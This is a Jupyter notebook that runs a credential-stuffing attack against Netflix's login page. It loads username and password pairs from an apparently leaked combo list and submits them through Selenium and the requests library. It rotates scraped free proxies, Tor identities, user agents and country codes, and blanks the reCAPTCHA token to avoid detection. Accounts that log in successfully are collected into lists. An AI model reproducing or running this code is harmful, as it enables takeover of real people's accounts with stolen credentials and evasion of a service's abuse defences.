In [ ]:
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.proxy import Proxy, ProxyType

In [1]:
# Usernames and passwords pool
fname = '/home/nerdo/Downloads/4.55M.txt'
names = []
passes = []
with open(fname, 'r') as file:
    for i in range(100000):
        line = file.readline().strip()
        names.append(line.split(':')[0])
        passes.append(line.split(':')[1])


In [ ]:
# Read the proxy file and create a proxy pool
pfname = '/home/nerdo/Downloads/proxy-list.txt'
proxies = []
with open(pfname, 'r') as pfile:
    lines = pfile.readlines()
    for line in lines:
        line = line.strip()
        if line[-3] == 'S':
            proxies.append(line.split(" ")[0])


In [ ]:
def ChangeProxy(ProxyHost ,ProxyPort):
    #"Define Firefox Profile with you ProxyHost and ProxyPort"
    profile = webdriver.FirefoxProfile()
    profile.set_preference("network.proxy.type", 1)
    profile.set_preference("network.proxy.http", ProxyHost )
    profile.set_preference("network.proxy.https", ProxyHost )
    profile.set_preference("network.proxy.http_port", int(ProxyPort))
    profile.set_preference("network.proxy.https_port", int(ProxyPort))
    profile.set_preference("network.proxy.ssl",ProxyHost)
    profile.set_preference("network.proxy.ssl_port",int(ProxyPort))  
    profile.set_preference("network.proxy.ftp",ProxyHost)
    profile.set_preference("network.proxy.ftp_port",int(ProxyPort))   
    profile.set_preference("network.proxy.socks",ProxyHost)
    profile.set_preference("network.proxy.socks_port",int(ProxyPort))
    profile.update_preferences()
    return webdriver.Firefox(firefox_profile=profile)

def tryProxy(_proxy):
    ProxyHost, ProxyPort = _proxy.split(':')
    driver = ChangeProxy(ProxyHost ,ProxyPort)
    try:
        driver.set_page_load_timeout(10)
        driver.get("https://whatismyipaddress.com")
    except:
        print("Time Out. Your proxy seems to be malfunctioning...")
        driver.close()

In [ ]:
tryProxy('107.150.50.126:80')

In [ ]:
# Testing proxy list
proxies_len = len(proxies)
for i in range(5):
    tryProxy(proxies[i])

In [ ]:
# Testing another proxy pool
new_pfname = '/home/nerdo/Downloads/Proxy-List.txt'
new_proxies = []
with open(new_pfname, 'r') as new_pfile:
    lines = new_pfile.readlines()
    for line in lines:
        line = new_proxies.append(line.strip())


In [ ]:
successfulNames = []
successfulPasswords = []

# Netflix using Selenium

In [ ]:
# Netflix


#capabilities = changeProxy()

url = "https://www.netflix.com/login"
driver = webdriver.Firefox()
driver.get(url)
#time.sleep(10)
driver.implicitly_wait(10)
length = len(names)


for i in range(2):
    driver.find_element_by_tag_name('body').send_keys(Keys.COMMAND + 't')
    driver.get(url)
    name = names[i]
    password = passes[i]
    
    usernameBox = driver.find_element_by_xpath(".//*[@id='id_userLoginId']")
    usernameBox.send_keys(name)
    passwordBox = driver.find_element_by_xpath(".//*[@id='id_password']")
    passwordBox.send_keys(password)
    #signinButton = driver.find_element_by_xpath(".//*[@class='btn.login-button']")
    signinButton = driver.find_element_by_class_name('btn.login-button')
    signinButton.send_keys(Keys.RETURN)
    
    
    driver.implicitly_wait(4)
    # Failing element
    failngClass = 'ui-message-contents'
    failingElement = driver.find_element_by_xpath(".//*[@class='"+failngClass+"']")
    if failingElement is None:
        successfulNames.append(name)
        successfulPasswords.append(password)
    
    
    driver.find_element_by_tag_name('body').send_keys(Keys.COMMAND + 'w')


# Netflix using Requests library

In [2]:
# Trying things out with Request Library (This is much faster than Selenium)
import requests
from bs4 import BeautifulSoup
import random
from itertools import cycle

In [3]:
# A pool of useragents to randomly select from
with open('useragents2.txt', 'r') as userAgentsFile:
    useragents = userAgentsFile.readlines()
    useragents = [useragent.strip() for useragent in useragents]
useragents = set(useragents)
useragents = cycle(useragents)

In [ ]:
headers = {
    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:75.0) Gecko/20100101 Firefox/75.0'
}

In [7]:
def isValidProxy(_proxySocket):
    url = 'https://httpbin.org/ip'
    _proxies = {
        "http": _proxySocket, 
        "https": _proxySocket
    }
    try:
        response = requests.get(url, proxies=_proxies,timeout=10)
    except requests.exceptions.Timeout:
        print("Time out.")
        return False
    except requests.exceptions.ConnectionError:
        print("Connection error with the proxy or the url")
        return False
    except requests.exceptions.RequestException:
        print("Some error occurred.")
        return False
    return True

In [ ]:
def createProxyDicts(_proxies):
    _proxyDicts = []
    for proxy in _proxies:
        proxyDict = {
            'http': 'http://' + proxy,
            'https': 'https://' + proxy
        }
        _proxyDicts.append(proxyDict)
    return _proxyDicts
proxyDicts = createProxyDicts(validProxies)
proxyDicts

In [ ]:
# List of country codes
import json
countriesJsonFile = '/home/nerdo/countries.json'
countriesList = set()
with open(countriesJsonFile, 'r') as countriesFile:
    countriesDict = json.load(countriesFile)
for ele in countriesDict:
    line = ele['alpha2']+':'
    if len(ele['countryCallingCodes']) > 0:
        line += ele['countryCallingCodes'][0]
    countriesList.add(line)
countries = cycle(countriesList)

In [ ]:
username = names[0]
password = passes[0]

testCountry = next(countries)
testCountryCode = testCountry.split(":")[0]
testCountryIsoCode = testCountry.split(":")[1]
def createPayload(_username, _password, _countryCode='', _countryIsoCode=''):
    payload = {
        'userLoginId': _username,
        'password': _password,
        'rememberMe': 'true',
        'flow': 'websiteSignUp',
        'mode': 'login',
        'action': 'loginAction',
        'nextPage': '',
        'showPassword': '',
        'countryCode': _countryCode,
        'countryIsoCode': _countryIsoCode,
        'recaptchaResponseToken': '',
        'recaptchaError': 'LOAD_TIMED_OUT'
    }
    return payload

def getCountryCodes(_countryCodeString):
    return _countryCodeString.split(":")[0], _countryCodeString.split(":")[1]


reservedPhrases = ['incorrect password. please try again or', "sorry, we can't find an account with this email address.",
                  'we are having technical difficulties and are actively working on a fix. please try again in a few minutes']

In [ ]:
names[2000]


# Performing through a proxy pool


In [ ]:
successfulNames=[]
successfulPasswords=[]

In [ ]:
%%time
proxyDict = proxyDicts[0]
for i in range(2):
    # Change proxy every 20 accounts
    if (i+1)%20 == 0:
        print('Changing proxy server...')
        proxyDict = random.choice(proxyDicts)
    
    name = names[i+100]
    password = passes[i+100]
    countryCode, countryIsoCode = getCountryCodes(next(countries))
    payload = createPayload(name, password, countryCode, countryIsoCode)
    headers['User-Agent'] = next(useragents)
    # Session should be opend just once
    # Need to edit this code, look at: https://realpython.com/python-concurrency/#synchronous-version
    with requests.Session() as s:
        url = 'https://www.netflix.com/login'
        s.proxies = proxyDict
        try:
            r = s.get(url, headers=headers, timeout=10)
            soup = BeautifulSoup(r.content, 'html5lib')
            if soup.find('input', attrs={'name': 'authURL'}) is not None:
                payload['authURL'] = soup.find('input', attrs={'name': 'authURL'})['value']
                if soup.find('input', attrs={'name': 'withFields'}) is not None:
                    payload['withFields'] = soup.find('input', attrs={'name': 'withFields'})['value']
            else:
                print('No authURL div appeared. Means that this is not the ordinary login page. Might be an error page')
                continue
        except requests.exceptions.Timeout:
            print('Account '+str(i)+ ' timed out.')
        except requests.exceptions.RequestException as e:
            raise SystemExit(e)
        r = s.post(url, data=payload, headers=headers)
        soup = BeautifulSoup(r.content, 'html5lib')
        errorBox = soup.find('a', attrs={'href': '/loginHelp'})
        divs = soup.find_all('div', attrs={'class':'ui-message-contents'})
        if divs is not None and len(divs) > 0:
            div = divs[1].text.lower()
            print(str(i) + '. for:',name, 'and:', password,' ERROR: ' +div)
        else:
            successfulNames.append(name)
            successfulPasswords.append(password)
        if reservedPhrases[0] in div or reservedPhrases[1] in div or reservedPhrases[2] in div:
            continue
        else:
            successfulNames.append(name)
            successfulPasswords.append(password)



# Trying through a proxy website


# Didn't work out because of request and response issues

In [ ]:
def insert (source_str, insert_str, pos):
    return source_str[:pos]+insert_str+source_str[pos:]
haha = insert('https://freeproxy.win', 'us5.', 8)
haha

In [ ]:
payload2 = {
    'url': 'netflix.com/login',
    'server': 'rnd'
}

In [ ]:
# Using a site that provides us with proxies
countryCode = 'UK'
countryIsoCode = '+44'
payload = createPayload(names[10], passes[10], countryCode, countryIsoCode)
with requests.Session() as s:
    url2 = 'https://freeproxy.win'
    r = s.get(url2, headers=headers)
    r = s.post(url2, data=payload2, headers=headers)
    requestURL = r.url
    soup = BeautifulSoup(r.content, 'html5lib')
    with open('testNetflix.html', 'w') as testNetFile:
        testNetFile.write(str(soup))
    qString = r.url.split('?')[1].split('=')[1]
    payload['q'] = qString
    r = s.post(insert(r.url, 'us3.',7), data=payload, headers=headers)
    soup = BeautifulSoup(r.content, 'html5lib')
    divs = soup.find_all('div', attrs={'class':'ui-message-contents'})
    with open('testNetflix.html', 'w') as testNetFile:
        testNetFile.write(str(soup))

In [ ]:
len(validProxies)


# # Yet another proxy list


In [8]:
def get_proxies(link):  
    response = requests.get(link)
    soup = BeautifulSoup(response.text,"html5lib")
    https_proxies = filter(lambda item: "yes" in item.text,
                           soup.select("table.table tr"))
    for item in https_proxies:
        yield "{}:{}".format(item.select_one("td").text,
                             item.select_one("td:nth-of-type(2)").text)

In [24]:
#!pip install lxml
generatorProxy = get_proxies('https://free-proxy-list.net/')
proxylist = set(generatorProxy)
proxyPool = cycle(proxylist)
len(proxylist)
proxylist

135

{'1.10.187.149:44976',
 '1.179.206.161:59033',
 '102.164.220.152:34336',
 '102.23.237.49:41014',
 '103.113.197.11:8080',
 '103.12.161.196:50514',
 '103.133.204.169:8080',
 '103.206.254.170:65103',
 '103.208.152.34:35817',
 '103.250.68.10:8080',
 '103.251.225.13:34052',
 '103.28.121.58:3128',
 '103.83.116.226:55443',
 '103.86.192.74:8080',
 '103.94.121.27:60109',
 '104.148.76.144:3128',
 '104.148.76.176:3128',
 '109.172.43.35:3129',
 '109.172.57.250:23500',
 '109.195.23.223:34031',
 '109.199.133.161:23500',
 '109.245.239.125:55311',
 '110.164.91.50:51065',
 '110.74.199.16:63141',
 '115.77.191.180:53281',
 '116.254.100.165:46675',
 '116.58.254.57:8080',
 '117.102.119.150:47704',
 '117.241.96.165:31892',
 '117.58.241.222:46021',
 '118.174.220.14:43473',
 '119.28.215.215:3023',
 '124.158.177.171:23500',
 '124.219.176.139:39589',
 '124.41.243.22:47894',
 '125.26.165.17:39947',
 '125.26.6.98:32385',
 '129.226.20.75:8080',
 '129.226.77.75:10000',
 '134.249.141.148:8080',
 '139.99.105.186:80',

In [11]:
validProxies = set()

In [ ]:
%%time
# Validate all proxies

k=0
for proxy in proxylist:
    if k%10 == 0:
        print(k)
    k += 1
    if isValidProxy(proxy):
        validProxies.add(proxy)

In [13]:
validProxies

set()

# Async version of validating proxies

In [15]:
import asyncio
import aiohttp
import time
import aiohttp_proxy
from aiohttp_proxy import ProxyConnector, ProxyType

In [34]:
# Async version of isValidProxy
# https://realpython.com/python-concurrency/


async def aIsValidProxy(_proxySocket):
    _url = 'https://httpbin.org/ip'
    _host, _port = _proxySocket.split(':')
    _connector = ProxyConnector(proxy_type=ProxyType.HTTPS, host=_host, port=_port, rdns=True)
    try:
        clientTimeout = aiohttp.ClientTimeout(connect=10, sock_connect=10, sock_read=10)
        async with aiohttp.request('GET', _url, connector=_connector, timeout=clientTimeout) as _response:
            print("Response {0} has text: {1}".format(_response.status, _proxySocket))
        await _connector.close()
    except asyncio.TimeoutError:
        print("{} had a timeout.".format(_proxySocket))
        return await False
    except Exception as e:
        print(e,"for {}".format(_proxySocket))
        return await False
    return await True

async def aValidateAllProxies(_proxylist):
    # Opening one session to speedup connections
    tasks = []
    for proxy in _proxylist:
        task = asyncio.ensure_future(aIsValidProxy(proxy))
        tasks.append(task)
    await asyncio.gather(*tasks, return_exceptions=True)
        

In [ ]:
# Will run on the proxylist scraped from the website

# Syntax will be this if this was plain Python

    #asyncio.run(aValidateAllProxies(proxylist))


# Since this is Jupyter (IPython), it should be like that
# The problem is that jupyter (IPython) is already running an event loop
# Look at this link: https://stackoverflow.com/a/55409674

try:
    loop = asyncio.get_running_loop()
except RuntimeError:  # if cleanup: 'RuntimeError: There is no current event loop..'
    loop = None

    
testproxylist = proxylist
if loop and loop.is_running():
    print('Async event loop already running')
    start_time = time.time()
    
    
    tsk = loop.create_task(aValidateAllProxies(testproxylist))
    # ^-- https://docs.python.org/3/library/asyncio-task.html#task-object
    tsk.add_done_callback(                                          # optional
        lambda t: print(f'Task done: '                              # optional
                        f'{t.result()=} << return val of aValidateAllProxies()'))  # optional (using py38)
    
    
    duration = time.time() - start_time
    print(f"Tried {len(testproxylist)} proxies in {duration} seconds")

else:
    print('Starting new event loop')
    asyncio.run(aValidateAllProxies(proxylist))

In [ ]:
len(validProxies)
proxylist
asyncio.get_event_loop()

In [ ]:
proxySocket = '120.72.26.184:37553'
if isValidProxy(proxySocket):
    print('Valid Proxy')

In [ ]:
%%time
# Filter valid proxies from my pools
proxies.append(proxySocket)
for proxy in proxies:
    if isValidProxy(proxy):
        validProxies.add(proxy)
for proxy in new_proxies:
    if isValidProxy(proxy):
        validProxies.add(proxy)

In [ ]:
len(validProxies)


# Requesting through Tor


# Seems to be detected from Netflix

In [ ]:
# Requsting through Tor
from torrequest import TorRequest

In [ ]:
dir(tr)

In [ ]:
# Testing
with tr as s:
        url = 'https://www.netflix.com/login'
        r = s.get(url, headers=headers, timeout=10)
        print(r.text)

In [ ]:
tr.reset_identity() #Reset Tor
response = tr.get('http://ipecho.net/plain')
print ("New Ip Address", response.text)

In [ ]:
def getIP(torSession):
    _response = torSession.get('http://ipecho.net/plain')
    return _response.text

In [ ]:
%%time

for i in range(0, 100):
    name = names[i+150]
    password = passes[i+150]
    #import pdb; pdb.set_trace()
    countryCode, countryIsoCode = getCountryCodes(countriesList[random.randint(0,len(countriesList))])
    payload = createPayload(name, password, countryCode, countryIsoCode)
    headers['User-Agent'] = useragents[random.randint(0, len(useragents))]
    with TorRequest(password='torhashpassword') as tr:
        # Change proxy every 20 accounts
        if i%20 == 0:
            print('Resetting Tor identity... The new IP is: ' + getIP(tr))
            tr.reset_identity()
        s = tr
        url = 'https://www.netflix.com/login'
        try:
            r = s.get(url, headers=headers, timeout=10)
            soup = BeautifulSoup(r.content, 'html5lib')
            with open('testNetflix.html', 'w') as testNetFile:
                testNetFile.write(str(soup))
            if soup.find('input', attrs={'name': 'authURL'}) is not None:
                payload['authURL'] = soup.find('input', attrs={'name': 'authURL'})['value']
                if soup.find('input', attrs={'name': 'withFields'}) is not None:
                    payload['withFields'] = soup.find('input', attrs={'name': 'withFields'})['value']
            else:
                continue
        except requests.exceptions.Timeout:
            print('Account '+str(i)+ ' timed out.')
        except requests.exceptions.RequestException as e:
            raise SystemExit(e)
        r = s.post(url, data=payload, headers=headers)
        soup = BeautifulSoup(r.content, 'html5lib')
        errorBox = soup.find('a', attrs={'href': '/loginHelp'})
        divs = soup.find_all('div', attrs={'class':'ui-message-contents'})
        if divs is not None and len(divs) > 0:
            div = divs[1].text.lower()
            print(str(i) + '. for:',name, 'and:', password,' ERROR:' +div)
        else:
            successfulNames.append(name)
            successfulPasswords.append(password)
        if reservedPhrases[0] in div or reservedPhrases[1] in div or reservedPhrases[2] in div:
            continue
        else:
            successfulNames.append(name)
            successfulPasswords.append(password)


In [ ]:
response= requests.get('http://ipecho.net/plain')
print ("My Original IP Address:",response.text)